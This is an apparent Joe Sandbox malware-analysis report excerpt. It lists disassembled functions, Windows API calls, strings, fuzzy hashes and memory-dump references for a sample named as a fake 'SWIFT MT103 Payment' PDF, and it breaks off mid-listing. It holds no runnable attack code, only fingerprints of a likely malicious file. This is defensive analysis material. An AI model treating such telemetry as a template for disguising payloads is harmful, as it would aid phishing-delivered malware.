                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                        • _wcscat.LIBCMT ref: 0046F3BC
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                        • DragFinish.SHELL32(?), ref: 0046F414
                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                        • API String ID: 4085615965-3440237614
                                                        • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                        • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                        • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                        • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __wcsicoll
                                                        • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                        • API String ID: 3832890014-4202584635
                                                        • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                        • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                        • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                        • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                        APIs
                                                        • _memset.LIBCMT ref: 004669C4
                                                        • _wcsncpy.LIBCMT ref: 00466A21
                                                        • _wcsncpy.LIBCMT ref: 00466A4D
                                                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                        • _wcstok.LIBCMT ref: 00466A90
                                                          • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                        • _wcstok.LIBCMT ref: 00466B3F
                                                        • _wcscpy.LIBCMT ref: 00466BC8
                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                        • _wcslen.LIBCMT ref: 00466D1D
                                                        • _memset.LIBCMT ref: 00466BEE
                                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                        • _wcslen.LIBCMT ref: 00466D4B
                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                        • String ID: X$HH
                                                        • API String ID: 3021350936-1944015008
                                                        • Opcode ID: 91267e8a1513f4651f1f38157624f9983fa4089e7cf591200ec43f7e61c50c8b
                                                        • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                        • Opcode Fuzzy Hash: 91267e8a1513f4651f1f38157624f9983fa4089e7cf591200ec43f7e61c50c8b
                                                        • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                        APIs
                                                        • _memset.LIBCMT ref: 0045F4AE
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                        • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                        • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu$Sleep_memset
                                                        • String ID: 0
                                                        • API String ID: 1504565804-4108050209
                                                        • Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                        • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                        • Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                        • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                        APIs
                                                        • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateDestroy
                                                        • String ID: ,$tooltips_class32
                                                        • API String ID: 1109047481-3856767331
                                                        • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                        • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                        • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                        • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                        APIs
                                                        • _wcsncpy.LIBCMT ref: 0045CCFA
                                                        • __wsplitpath.LIBCMT ref: 0045CD3C
                                                        • _wcscat.LIBCMT ref: 0045CD51
                                                        • _wcscat.LIBCMT ref: 0045CD63
                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                          • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                        • _wcscpy.LIBCMT ref: 0045CE14
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                        • String ID: *.*
                                                        • API String ID: 1153243558-438819550
                                                        • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                        • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                        • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                        • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                        APIs
                                                        • _memset.LIBCMT ref: 00455127
                                                        • GetMenuItemInfoW.USER32 ref: 00455146
                                                        • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                        • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                        • GetMenuItemCount.USER32(?), ref: 004551D9
                                                        • SetMenu.USER32(?,00000000), ref: 004551E7
                                                        • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                        • DrawMenuBar.USER32 ref: 00455207
                                                        • DeleteObject.GDI32(?), ref: 0045564E
                                                        • DeleteObject.GDI32(?), ref: 0045565C
                                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                        • String ID: 0
                                                        • API String ID: 1663942905-4108050209
                                                        • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                        • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                        • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                        • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1481289235-0
                                                        • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                        • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                        • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                        • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                        APIs
                                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                        • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                        • SendMessageW.USER32 ref: 0046FBAF
                                                        • SendMessageW.USER32 ref: 0046FBE2
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                        • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                        • SendMessageW.USER32 ref: 0046FD00
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                        • String ID:
                                                        • API String ID: 2632138820-0
                                                        • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                        • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                        • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                        • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                        APIs
                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                        • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CursorLoad
                                                        • String ID:
                                                        • API String ID: 3238433803-0
                                                        • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                        • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                        • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                        • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                        • _wcslen.LIBCMT ref: 00460B00
                                                        • __swprintf.LIBCMT ref: 00460B9E
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                        • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                        • GetWindowRect.USER32(?,?), ref: 00460D21
                                                        • GetParent.USER32(?), ref: 00460D40
                                                        • ScreenToClient.USER32(00000000), ref: 00460D47
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                        • String ID: %s%u
                                                        • API String ID: 1899580136-679674701
                                                        • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                        • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                        • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                        • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                        APIs
                                                        • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                        • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                        • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                        • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                        • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                        • API String ID: 2485709727-934586222
                                                        • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                        • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                        • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                        • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                        • String ID: HH
                                                        • API String ID: 3381189665-2761332787
                                                        • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                        • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                        • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                        • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 00434585
                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                        • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                        • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                        • String ID: (
                                                        • API String ID: 3300687185-3887548279
                                                        • Opcode ID: 1bab6ecf4e135c51c2edb171e5b0321b63d7b1f7db833365ea55ca1094655496
                                                        • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                        • Opcode Fuzzy Hash: 1bab6ecf4e135c51c2edb171e5b0321b63d7b1f7db833365ea55ca1094655496
                                                        • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                        APIs
                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                        • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                        • __swprintf.LIBCMT ref: 0045E4D9
                                                        • _printf.LIBCMT ref: 0045E595
                                                        • _printf.LIBCMT ref: 0045E5B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
